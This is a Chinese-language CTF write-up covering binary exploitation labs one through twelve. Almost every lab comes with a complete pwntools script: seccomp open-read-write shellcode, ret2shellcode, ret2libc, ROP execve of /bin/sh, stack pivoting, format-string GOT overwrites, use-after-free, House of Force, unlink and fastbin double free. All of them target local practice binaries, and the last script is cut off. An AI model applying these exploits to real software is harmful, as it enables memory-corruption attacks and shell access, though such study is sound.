lab1
略
lab2
反编译
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| unsigned int orw_seccomp()
{
__int16 v1; // [esp+4h] [ebp-84h]
char *v2; // [esp+8h] [ebp-80h]
char v3; // [esp+Ch] [ebp-7Ch]
unsigned int v4; // [esp+6Ch] [ebp-1Ch]
v4 = __readgsdword(0x14u);
qmemcpy(&v3, &unk_8048640, 0x60u);
v1 = 12;
v2 = &v3;
prctl(38, 1, 0, 0, 0);
prctl(22, 2, &v1);
return __readgsdword(0x14u) ^ v4;
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
orw_seccomp();
printf("Give my your shellcode:");
read(0, &shellcode, 0xC8u);
((void (*)(void))shellcode)();
return 0;
}
|
可以执行shellcode但是存在prctl函数的限制
prctl 函数
这个函数可以对进程就行操作,第一个参数可以指定你想做的事。
函数原型:
1
2
3
| #include <sys/prctl.h>
int prctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5);
|
第一个参数是指定相应的操作,这里我们需要重点关注两个:
1
2
| 1. PR_SET_NO_NEW_PRIVS
2. PR_SET_SECCOMP
|
继续看手册上的介绍,对于第一个参数选项,如果 option 设置为 PR_SET_NO_NEW_PRIVS 的话,第二个参数如果设置为 1 的话,不能够进行 execve 的系统调用,同时这个选项还会继承给子进程。
这样的话常规的调用 system 函数、one_gadget 的用不了了,这里的设置点其实和 pwnable.tw 上 orw 那道题一样,只能进行几个系统调用:open、write、read。
这里也就是调用下面的语句进行设置:
prctl(PR_SET_NO_NEW_PRIVS, 1LL...);
在 include/linux/prctl.h 中找到 PR_SET_NO_NEW_PRIVS 常量对应的数值,正好是 38,因此也就对应上了题目中的第一个 prctl 语句。
因此在orw_seccomp方法限制之下,不能用system(/bin/sh)或者execve(/bin/sh)了
想要获取flag只能进行如下操作
1
2
3
| fd = open("flag")
read(fd, buf, 0x30)
write(1, buf, 0x30)
|
这段代码对应的汇编是这样的:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| > push 1;
> dec byte ptr [esp]; 先将1入栈后在用dec指令减1,得到0作为指针数组的第二个元素
> push 0x67616c66; 再将“flag”入栈作为指针数组的第一个元素
> mov ebx,esp; ebx指向栈顶也就是指向 open函数的第一个参数(指针数组)
> xor ecx,ecx; xor清零ecx对应第二个参数
> xor edx,edx; xor清零edx对应第三个参数
> xor eax,eax; xor清零eax
> mov al,0x5; 向eax传入系统调用号0x05
> int 0x80; 调用fp=open("flag",0)
> mov ebx,eax; ebx被赋值为0x05,read(fp,buf,0x30)
> xor eax,eax; xor清空eax
> mov al,0x3; 传入read函数对应的系统调用号
> mov ecx,esp; 将栈顶的地址传给ecx作为read的第二个参数,将flag文件中的内容入栈
> mov dl,0x30; read的第三个参数,读0x30个字符
> int 0x80; 调用read(fp,buf,0x30)
> mov al,0x4; write函数的系统调用号,write(1,buf,0x30)
> mov bl,1; ebx对应第一个参数
> mov dl,0x30; edx对应第三个参数
> int 0x80; 调用write(1,buf,0x30)
|
实际上seccomp(全称:secure computing mode),将进程可用的系统调用限制为四种:read,write,_exit,sigreturn。最初的这种模式是白名单方式,在这种安全模式下,除了已打开的文件描述符和允许的四种系统调用,如果尝试其他系统调用,内核就会使用SIGKILL或SIGSYS终止该进程。
可以使用seccomp-tools来查看可以使用的系统调用。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| # seccomp-tools dump ./orw.bin
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x09 0x40000003 if (A != ARCH_I386) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x07 0x00 0x000000ad if (A == rt_sigreturn) goto 0011
0004: 0x15 0x06 0x00 0x00000077 if (A == sigreturn) goto 0011
0005: 0x15 0x05 0x00 0x000000fc if (A == exit_group) goto 0011
0006: 0x15 0x04 0x00 0x00000001 if (A == exit) goto 0011
0007: 0x15 0x03 0x00 0x00000005 if (A == open) goto 0011
0008: 0x15 0x02 0x00 0x00000003 if (A == read) goto 0011
0009: 0x15 0x01 0x00 0x00000004 if (A == write) goto 0011
0010: 0x06 0x00 0x00 0x00050026 return ERRNO(38)
0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW
|
这里可以看到只有open, read, write这几种。
也可以直接使用shellcraft来编写汇编
https://pwntoolsdocinzh-cn.readthedocs.io/en/master/shellcraft.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| from pwn import *
context.log_level = "debug"
p=process('./orw.bin')
# push path
payload=shellcraft.pushstr('./flag.txt')
# open file
payload+=shellcraft.open("esp")
# read file
payload+=shellcraft.read("eax","esp",0x100)
# write stdout
payload+=shellcraft.write(1,"esp",0x100)
p.recv(1024)
#gdb.attach(p)
p.sendline(asm(payload))
p.recvall()
p.close()
|
lab3
反编译:
1
2
3
4
5
6
7
8
9
10
| int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [esp+1Ch] [ebp-14h]
setvbuf(stdout, 0, 2, 0);
printf("Name:");
read(0, &name, 0x32u);
printf("Try your best:");
return (int)gets(&s);
}
|
简单栈溢出, name(0x0804a060)所在段可执行,可写shellcode,利用gets处的溢出将main的返回地址改成name的地址。
1
2
3
4
5
| pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x8048000 0x8049000 r-xp 1000 0 /home/LAB/lab3/ret2sc
0x8049000 0x804a000 r-xp 1000 0 /home/LAB/lab3/ret2sc
0x804a000 0x804b000 rwxp 1000 1000 /home/LAB/lab3/ret2sc
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| #coding=utf-8
from pwn import *
context.log_level = "debug"
context.terminal = ["tmux", "split", "-h"]
r = process("./ret2sc")
r.recvuntil(":")
shellcode = asm(shellcraft.sh())
r.sendline(shellcode)
r.recvuntil(":")
name_address = 0x0804a060
payload = "a"*32 + p32(name_address)
r.sendline(payload)
r.interactive()
|
lab4
反编译:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| int __cdecl main(int argc, const char **argv, const char **envp)
{
char **v4; // [esp+4h] [ebp-11Ch]
int v5; // [esp+8h] [ebp-118h]
char src; // [esp+12h] [ebp-10Eh]
char buf; // [esp+112h] [ebp-Eh]
const void **v8; // [esp+11Ch] [ebp-4h]
puts("###############################");
puts("Do you know return to library ?");
puts("###############################");
puts("What do you want to see in memory?");
printf("Give me an address (in dec) :");
fflush(stdout);
read(0, &buf, 0xAu);
v8 = (const void **)strtol(&buf, v4, v5);
See_something(v8);
printf("Leave some message for me :");
fflush(stdout);
read(0, &src, 0x100u);
Print_message(&src);
puts("Thanks you ~");
return 0;
}
|
See_something函数支持打印出v8地址处的值,可以泄露出libc的地址。然后利用Print_message的栈溢出将其返回地址修改成system函数的地址。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| #coding=utf-8
from pwn import *
context.terminal = ["tmux", "split", "-h"]
context.log_level = "debug"
DEBUG = 1
r = process("./ret2lib")
if DEBUG:
gdb.attach(r, """
b *0x0804857c
c
""")
r.recvuntil(":")
puts_got = 0x0804a01c
r.sendline(str(puts_got))
r.recvuntil("The content of the address :")
puts_str = r.recvuntil('\n')
success("recv address: " + puts_str)
puts = int(puts_str, 16)
success("puts address: " + hex(puts))
system = puts - 0x5fcb0 + 0x3adb0
sh = 0x804929e
payload = "a"*0x3c + p32(system) + "aaaa" + p32(sh)
r.recvuntil(":")
r.sendline(payload)
r.interactive()
|
lab5
1
2
3
4
5
6
7
8
9
| int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [esp+1Ch] [ebp-14h]
puts("ROP is easy is'nt it ?");
printf("Your input :");
fflush(stdout);
return read(0, &v4, 100);
}
|
栈溢出,静态链接,没有system函数与/bin/sh只能自己构造。
int 0x80
通过系统调用实现的hello world代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| .section .data
msg:
.ascii "Hello world!\n"
.section .text
.globl _start
_start:
movl $4, %eax
movl $1, %ebx
movl $msg, %ecx
movl $13, %edx
int $0x80
movl $1, %eax
movl $0, %ebx
int $0x80
|
系统调用是通过int 0x80来实现的,eax寄存器中为调用的功能号,ebx、ecx、edx、esi等等寄存器则依次为参数
所以需要将/bin/sh写入bss段,然后利用系统调用执行
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| #coding=utf-8
from pwn import *
r = process("./simplerop)
gadget = 0x809a15d # mov dword ptr [edx], eax ; ret
pop_eax_ret = 0x80bae06
pop_edx_ret = 0x806e82a
pop_edx_ecx_ebx = 0x0806e850
pop_eax_ret = 0x080bae06
buf = 0x80ea060
int_80 = 0x80493e1
#write to memory
payload = "a"*32
payload += p32(pop_edx_ret)
payload += p32(buf)
payload += p32(pop_eax_ret)
payload += "/bin"
payload += p32(gadget)
payload += p32(pop_edx_ret)
payload += p32(buf+4)
payload += p32(pop_eax_ret)
payload += "/sh\x00"
payload += p32(gadget)
#write to register
payload += p32(pop_edx_ecx_ebx)
payload += p32(0)
payload += p32(0)
payload += p32(buf)
payload += p32(pop_eax_ret)
payload += p32(0xb)
payload += p32(int_80)
print len(payload)
r.recvuntil(":")
r.sendline(payload)
r.interactive()
|
lab6
1
2
3
4
5
6
7
8
9
10
11
| int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf; // [esp+0h] [ebp-28h]
if ( count != 1337 )
exit(1);
++count;
setvbuf(_bss_start, 0, 2, 0);
puts("Try your best :");
return read(0, &buf, 0x40u);
}
|
栈不可执行。并且可以溢出的大小只有20个字节,而且限制了main函数只能执行一次,所以需要用到栈迁移。
以32位为例,在使用call这个命令,进入一个函数的时候,程序会进行一系列栈操作:
push eip+4;push ebp;mov ebp,esp;来保护现场,避免执行完函数后堆栈不平衡以及找不到之前的入口地址。
leave ret相当于
1
2
| leave ==> mov esp, ebp; pop ebp;
ret ==> pop eip
|
其中pop eip相当于将栈顶数据给eip,由于ret返回的是栈顶数据,而栈顶地址是由esp的值决定的,esp的值,从leave可以得出是由ebp决定的。所以我们可以通过覆盖ebp的值来控制ret返回地址。两次leave ret即可控制esp为我们想要的地址。由于有pop ebp,会使esp-4,将ebp 覆盖为想要调整的位置-4即可。
查看程序的空间分布
1
2
3
4
5
6
7
| pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x8048000 0x8049000 r-xp 1000 0 /home/LAB/lab6/migration
0x8049000 0x804a000 r–p 1000 0 /home/LAB/lab6/migration
0x804a000 0x804b000 rw-p 1000 1000 /home/LAB/lab6/migration
0xf7d77000 0xf7d78000 rw-p 1000 0
0xf7d78000 0xf7f28000 r-xp 1b0000 0 /lib/i386-linux-gnu/libc-2.23.so
|
可以看到0x804a000后有0x1000的可读写空间,可以将栈迁移到这个地方。
首先第一次需要改变ebp的值,然后转到read函数处,读入内容的地址为栈迁移的地址。将read以后的返回地址写成leave gadget以此达到栈迁移的目的。
1
2
| bss_addr = 0x804a000
payload = flat(['a'*0x28, bss_addr+0x300, read_addr, leave_gadget, 0, bss_addr+0x300, 0x30])
|
第二次需要泄露libc的地址,使用puts打印出read/puts函数got表中的地址。
1
| payload = flat([bss_addr+0x600, puts_addr, pop_ret, puts_got, read_addr, leave_gadget, 0, bss_addr+600, 0x30])
|
第三次需要返回到system函数处
1
| payload = flat([bss_addr+0x300, system_addr, pop_ret, bin_addr])
|
exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
| from pwn import *
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
r = process("./migration")
elf = ELF("./migration")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
bss_addr = 0x804a000
leave_ret = 0x08048418
pop_ebx_ret = 0x0804836d
read_plt = elf.plt["read"]
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
DEBUG = 1
if DEBUG:
gdb.attach(r, """
b *0x08048418
""")
payload = "a" * 0x28
payload += p32(bss_addr + 0x300) # fake ebp
payload += p32(read_plt) # read(0,buf,0x30)
payload += p32(leave_ret) # ret to buf
payload += p32(0) # fd
payload += p32(bss_addr + 0x300) # buf
payload += p32(0x30) # bytes
r.recvuntil(":\n")
r.send(payload)
sleep(0.2)
payload = p32(bss_addr + 0x600) # fake ebp
payload += p32(puts_plt) # puts(puts_got)
payload += p32(pop_ebx_ret)
payload += p32(puts_got)
payload += p32(read_plt) # read(0,buf + 0x100,0x30)
payload += p32(leave_ret) # ret to buf + 0x100
payload += p32(0) # fd
payload += p32(bss_addr + 0x600) # buf
payload += p32(0x30) # bytes
r.sendline(payload)
sleep(0.2)
libc_base = u32(r.recv(4)) - libc.sym["puts"]
success("libc_base : " + hex(libc_base))
system_addr = libc_base + libc.sym["system"]
bin_sh_addr = libc_base + libc.search("/bin/sh").next()
payload = p32(0)
payload += p32(system_addr) # system("/bin/sh")
payload += p32(0)
payload += p32(bin_sh_addr)
r.sendline(payload)
r.interactive()
|
lab7
格式化字符串,直接泄露password的值
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.terminal = ["tmux", "split", "-h"]
r = process("./crack")
#gdb.attach(r, """
# b *0x080486E9
#""")
password_addr = 0x804a048
r.recvuntil("?")
r.sendline(p32(password_addr) + "#" + "%10$s" + "#" )
r.recvuntil("#")
p = r.recvuntil("#")
password = u32(p[:4])
success("password: " + str(password))
r.recvuntil(":")
r.sendline(str(password))
r.interactive()
|
或者直接更改password的值
1
2
3
4
5
6
7
8
9
10
11
12
| from pwn import *
context.log_level = 'debug'
cn = process('./crack')
p_pwd = 0x0804A048
fmt_len = 10
cn.recv()
pay = fmtstr_payload(fmt_len,{p_pwd:1})
cn.sendline(pay)
cn.recv()
cn.sendline('1')
cn.recv()
cn.recv()
|
fmtstr_payload函数可以直接生成payload。简单使用如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
| Makes payload with given parameter. It can generate payload for 32 or 64 bits architectures. The size of the addr is taken from context.bits
The overflows argument is a format-string-length to output-amount tradeoff: Larger values for overflows produce shorter format strings that generate more output at runtime.
Parameters:
offset (int) – the first formatter’s offset you control
writes (dict) – dict with addr, value {addr: value, addr2: value2}
numbwritten (int) – number of byte already written by the printf function
write_size (str) – must be byte, short or int. Tells if you want to write byte by byte, short by short or int by int (hhn, hn or n)
overflows (int) – how many extra overflows (at size sz) to tolerate to reduce the length of the format string
strategy (str) – either ‘fast’ or ‘small’ (‘small’ is default, ‘fast’ can be used if there are many writes)
Returns:
The payload in order to do needed writes
|
主要用到的就是前2个参数:
- offset:第一个格式化字符存放的位置偏移。
- 如何得到这个偏移,其实最简单的就是直接%X打印栈,如下
1
2
3
4
5
| # ./crack
What your name ? aaaa.%X.%X.%X.%X.%X.%X.%X.%X.%X.%X.%X.%X.%X.%X
Hello ,aaaa.FFAD7FC8.63.0.F7FA3A9C.3.F7F75410.1.0.1.61616161.2E58252E.252E5825.58252E58.2E58252E
�����H���Your password :11
Goodbyte
|
格式化字符串第一个字符aaaa其位置通过不停的打印栈可以得到在偏移10(0xa)位置出现,偏移以0开始,便可以直接得到此参数为10。
- writes:一个字典,用来写数据,以 {addr: value, addr2: value2,…}将value写入addr位置。
- numbwritten:如果printf前面还有打印的字符,就需要设置这个参数
- write_size:写入的大小,是每次单字节写入,还是一次写入双字节,还是一次写入四个字节。
lab8
格式化字符串, 目的是写大的数字, 可以直接利用fmtstr_payload生成payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| #codinf=utf-8
from pwn import *
context.terminal = ["tmux", "split", "-h"]
context.log_level = "debug"
r = process("./craxme")
gdb.attach(r, """
b *0x80485c6
c
""")
r.recvuntil(":")
magic = 0x804a038
payload = fmtstr_payload(7, {magic: 0xFACEB00C})
r.sendline(payload)
r.interactive()
|
lab9
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(stdout, 0, 2, 0);
return play();
}
int play()
{
puts("=====================");
puts(" Magic echo Server");
puts("=====================");
return do_fmt();
}
int do_fmt()
{
int result; // eax
while ( 1 )
{
read(0, buf, 200u);
result = strncmp(buf, "quit", 4u);
if ( !result )
break;
printf(buf);
}
return result;
}
|
这里的格式化字符串存在于bss段并不在栈上,所以不能根据第n个参数来泄露或者更改数据。
出题人把格式化串放到堆或是bss段中,不能和原来的一样那样去读取格式化字符串串中的目标地址,不在栈中你是不可能读到的。对于这种题目的做法就是要进行两次漏洞利用,第一次将当前题目变成常规题目样式。第二次就成了常规格式化字符串题目。
具体指的是:
第一次:在栈中找一个指向栈里面的指针(这种指针肯定会有,因为堆栈框架就是这样的),往其写入第二次要写入的地址。
第二次:常规格式化字符串exp操作
执行到printf函数时的栈如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
| 00:0000│ esp 0xff8b5fd0 —▸ 0x804a060 (buf) ◂— '%6$p.%15$pstep1'
01:0004│ 0xff8b5fd4 —▸ 0x8048640 ◂— jno 0x80486b7 /* 'quit' */
02:0008│ 0xff8b5fd8 ◂— 0x4
03:000c│ 0xff8b5fdc —▸ 0x804857c (play+51) ◂— add esp, 0x10
04:0010│ 0xff8b5fe0 —▸ 0x8048645 ◂— cmp eax, 0x3d3d3d3d /* '=====================' */
05:0014│ 0xff8b5fe4 —▸ 0xf7f68000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
06:0018│ ebp 0xff8b5fe8 —▸ 0xff8b5ff8 —▸ 0xff8b6008 ◂— 0x0
07:001c│ 0xff8b5fec —▸ 0x8048584 (play+59) ◂— nop
08:0020│ 0xff8b5ff0 —▸ 0xf7f68d60 (_IO_2_1_stdout_) ◂— 0xfbad2887
09:0024│ 0xff8b5ff4 ◂— 0x0
0a:0028│ 0xff8b5ff8 —▸ 0xff8b6008 ◂— 0x0
0b:002c│ 0xff8b5ffc —▸ 0x80485b1 (main+42) ◂— nop
0c:0030│ 0xff8b6000 —▸ 0xf7f683dc (__exit_funcs) —▸ 0xf7f691e0 (initial) ◂— 0x0
0d:0034│ 0xff8b6004 —▸ 0xff8b6020 ◂— 0x1
0e:0038│ 0xff8b6008 ◂— 0x0
0f:003c│ 0xff8b600c —▸ 0xf7dcd647 (__libc_start_main+247) ◂— add esp, 0x10
10:0040│ 0xff8b6010 —▸ 0xf7f68000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
... ↓
12:0048│ 0xff8b6018 ◂— 0x0
13:004c│ 0xff8b601c —▸ 0xf7dcd647 (__libc_start_main+247) ◂— add esp, 0x10
14:0050│ 0xff8b6020 ◂— 0x1
15:0054│ 0xff8b6024 —▸ 0xff8b60b4 —▸ 0xff8b792a ◂— './playfmt'
16:0058│ 0xff8b6028 —▸ 0xff8b60bc —▸ 0xff8b7934 ◂— 'LANG=C.UTF-8'
17:005c│ 0xff8b602c ◂— 0x0
... ↓
1a:0068│ 0xff8b6038 —▸ 0xf7f68000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
1b:006c│ 0xff8b603c —▸ 0xf7f9ec04 ◂— 0x0
1c:0070│ 0xff8b6040 —▸ 0xf7f9e000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
1d:0074│ 0xff8b6044 ◂— 0x0
1e:0078│ 0xff8b6048 —▸ 0xf7f68000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
... ↓
20:0080│ 0xff8b6050 ◂— 0x0
21:0084│ 0xff8b6054 ◂— 0x87314245
22:0088│ 0xff8b6058 ◂— 'U\x0c]('
23:008c│ 0xff8b605c ◂— 0x0
... ↓
26:0098│ 0xff8b6068 ◂— 0x1
27:009c│ 0xff8b606c —▸ 0x8048400 (_start) ◂— xor ebp, ebp
28:00a0│ 0xff8b6070 ◂— 0x0
29:00a4│ 0xff8b6074 —▸ 0xf7f8f010 (_dl_runtime_resolve+16) ◂— pop edx
2a:00a8│ 0xff8b6078 —▸ 0xf7f89880 (_dl_fini) ◂— push ebp
2b:00ac│ 0xff8b607c —▸ 0xf7f9e000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
2c:00b0│ 0xff8b6080 ◂— 0x1
2d:00b4│ 0xff8b6084 —▸ 0x8048400 (_start) ◂— xor ebp, ebp
2e:00b8│ 0xff8b6088 ◂— 0x0
2f:00bc│ 0xff8b608c —▸ 0x8048421 (_start+33) ◂— hlt
30:00c0│ 0xff8b6090 —▸ 0x8048587 (main) ◂— lea ecx, [esp + 4]
31:00c4│ 0xff8b6094 ◂— 0x1
32:00c8│ 0xff8b6098 —▸ 0xff8b60b4 —▸ 0xff8b792a ◂— './playfmt'
33:00cc│ 0xff8b609c —▸ 0x80485c0 (__libc_csu_init) ◂— push ebp
34:00d0│ 0xff8b60a0 —▸ 0x8048620 (__libc_csu_fini) ◂— ret
35:00d4│ 0xff8b60a4 —▸ 0xf7f89880 (_dl_fini) ◂— push ebp
36:00d8│ 0xff8b60a8 —▸ 0xff8b60ac —▸ 0xf7f9e918 ◂— 0x0
37:00dc│ 0xff8b60ac —▸ 0xf7f9e918 ◂— 0x0
38:00e0│ 0xff8b60b0 ◂— 0x1
39:00e4│ 0xff8b60b4 —▸ 0xff8b792a ◂— './playfmt'
3a:00e8│ 0xff8b60b8 ◂— 0x0
3b:00ec│ 0xff8b60bc —▸ 0xff8b7934 ◂— 'LANG=C.UTF-8
|
大致需求是:
- 栈上存放了
__libc_start_main地址,可以用来计算libc地址,同时由于涉及到利用栈上变量当跳板,需要泄露出esp的值。这样就可以得到此时esp值和lib_start_main地址,进一步得到libc地址与system地址。 - 需要存放了栈上地址的栈地址作为跳板,形象地说就是:栈地址->栈地址->栈地址(这个之所以选择栈地址的目的就是为了尽量减少需要修改的字节数量,毕竟数量一多格式化字符串前面的%{n}c就越大,也就越慢了,甚至解不出来)
- 可以选择0x15 0x16
- 0x15->0x39->栈地址
- 0x16->0x3b->栈地址
- 需要存放0x0804xxxx的栈地址,这样的目的是got表也是0x0804xxxx,这样可以只用修改低2字节。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
| """
1. 0x15存放的0x39处地址,在此处利用漏洞(%21$hn)将0x39处值修改为0x7地址
2. 0x16存放的0x3b处地址,在此处利用漏洞(%22$hn)将0x3b处值修改为0xb地址
3. 此时0x39存放的0x7地址,0x3b存放的0xb地址
4. 在0x39处利用漏洞(%57$hn)利用漏洞将0x7处存放的值改为printf_got地址
5. 在0x3b处利用漏洞(%59$hn)利用漏洞将0xb处存放的值改为printf_got+2地址
6. 至此已经将printf_got以及printf_got+2地址放入了栈上0x7和0xb处。
7. 利用漏洞将printf_got和printf_got+2两个地址处的双字节修改为system高双字节和低双字节地址
8. 最后传入”/bin/sh”,在程序调用printf时便实现劫持得到shell
"""
from pwn import *
# context.log_level = "debug"
def hhn(addr,offset):
return "%{addr}c%{offset}$hhn".format(addr=addr,offset=offset)
def hn(addr,offset):
return "%{addr}c%{offset}$hn".format(addr=addr,offset=offset)
p = process("./playfmt")
elf = ELF("./playfmt")
libc = elf.libc
#step1 leak esp and libc
payload = "%6$p.%15$pstep1\x00"
p.sendlineafter(" Magic echo Server\n=====================\n",payload)
p.recvuntil('0x')
esp_addr=int(p.recv(8),16)-0x28
p.recvuntil('0x')
libc_main_addr=int(p.recv(8),16)-241
libc_addr = libc_main_addr - libc.symbols["__libc_start_main"] - 6
system_addr = libc_addr + libc.symbols["system"]
success("esp addr:{:#x} ".format(esp_addr))
success("libc addr:{:#x} ".format(libc_addr))
success("system addr:{:#x} ".format(system_addr))
# step2 change 0x39 and 0x3b with 0x15 0x16
payload = hn((esp_addr+0x1c)&0xffff,0x15)
payload += hn(((esp_addr+0x2c)&0xffff-(esp_addr+0x1c)&0xffff)%0xffff,0x16)
payload += 'step2\x00'
p.sendlineafter("step1",payload)
#step3 change 0x7 0xb with 0x39 0x3b
payload = hn((elf.got['printf'])&0xffff,0x39)
payload += hn(2,0x3b)
payload += 'step3\x00'
p.sendlineafter('step2',payload)
#step4 change got with 0x7 0xb
payload = hhn(system_addr >> 16 & 0xff,0xb)
payload += hn((system_addr&0xffff) - (system_addr >> 16 & 0xff),0x7)
payload += 'step4\x00'
p.sendlineafter('step3',payload)
while True:
sleep(0.1)
data = p.recv()
if data.find("step4") != -1:
break
#step5 send /bin/sh
p.sendline('/bin/sh\x00')
p.interactive()
|
lab10
note的数据结构如下:
1
2
3
4
| struct note {
void (*printnote)();
char *content ;
};
|
在delete功能中存在UAF,可以覆盖printnote函数的指针。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| #coding=utf-8
from pwn import *
context.log_level = "debug"
context.terminal = ["tmux", "split", "-h"]
r = process("./hacknote")
def addNote(size, content):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)
def deleteNote(idx):
r.recvuntil(":")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
def printNote(idx):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
magic = 0x8048986
addNote(32, "aa")
addNote(32, "aa")
deleteNote(0)
deleteNote(1)
addNote(8, p32(magic) + "aaa")
r.interactive()
|
lab11
在change_item方法中存在overflow,有多种利用方式
itemlist的数据结构:
1
2
3
4
| struct item{
int size ;
char *name ;
};
|
1. 修改top chunk大小,再分配chunk,实现地址任意写
第一次malloc会将heap分成两个chunk,第一块是分配出去的chunk,剩下的空间被视为top chunk,之后分配空间不足时会将top chunk切出。
在没有进行add item操作之前就存在一个chunk,用于存储hello_message和goodbye_message的函数指针。最终执行exit功能的时候会调用goodbye_message方法,可以首先修改top chunk的大小,达到任意写,然后修改goodbye_message方法的指针。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| #coding=utf-8
from pwn import *
context.log_level = "debug"
context.terminal = ["tmux", "split", "-h"]
r = process("./bamboobox")
def addItem(size, content):
r.recvuntil(":")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)
def changeItem(idx, size, content):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)
def deleteItem(idx):
r.recvuntil(":")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(idx))
addItem(0x60, "aa")
changeItem(0, 0x70, "a"*0x60 + p64(0) + p64(0xffffffffffffffff))
addItem(-160, "aa")
addItem(16, p64(0x400D49) + p64(0x400D49))
r.interactive()
|
2. 利用unlink调用magic函数
这里主要是构造能够通过检查的chunk数据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| addItem(0x80,"a"*8) #chunk0
addItem(0x80,"b"*8) #chunk1
addItem(0x80,"c"*8) #chunk2
#需要注意,这三个chunk的大小都要保证不在fastbin的范围内
#因为fastbin的size的p位默认为1,就无法进行unlink操作
FD = 0x6020c8 - 3*8 #在bss段,0x6020c8恰好存储了chunk0的指针
BK = FD +8
payload1 = p64(0)+p64(0x81)+p64(FD)+p64(BK)+"a"*0x60
payload1 += p64(0x80)+p64(0x90)
changeItem(0,0x90,payload1)
deleteItem(1)
#构造一个假的大小为0x80的fake_chunk,同时通过堆溢出
#将chunk1的pre_size和size进行修改,使得size的p位为0
#在free掉chunk1的时候,fake_chunk和chunk1就会进行合并
#这时就会对fake_chunk进行unlink操作
#这时就要对FD和BK进行精心构造,使得能够绕过unlink的检查
#也就是使得:FD->bk = p && BK->fd = p
#在通过检查后,unlink会导致:*p=p-3*8=0x6020c8 - 3*8
payload2 = p64(0)+p64(0)+p64(0x80)+p64(FD)+p64(0x80)+p64(atoi_got)
changeItem(0,len(payload2),payload2)
changeItem(1,0x10,p64(magic))
#这时向chunk0中输入内容,实际上也就是向0x6020c8 - 3*8中输入内容
#可以修改chunk_list,从而构造 UAF
r.recvuntil("Your choice:")
r.sendline("5")
r.interactive()
|
lab12
fastbin double free漏洞,利用double free修改fd使得下下次malloc该chunk的时候可以取得自己想要的位置。
在下一次malloc(bytes)的时候,根据bytes的大小取得index后,到对应的fastbin找,取出后检查该chunk的(unsigned long)size是否属于该fastbin。
- 但比较的时候是先以fastbin中第一个size取得fastbin的index,再去用这个index跟刚刚算的index是否相同,不过这里取index的方式是用unsigned int(4 byte),所以伪造时不用满足8 byte
- 因为没有检查alignment所以不一定要以8的倍数作为chunk的address
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| #coding=utf-8
from pwn import *
context.log_level = "debug"
context.terminal = ["tmux", "split", "-h"]
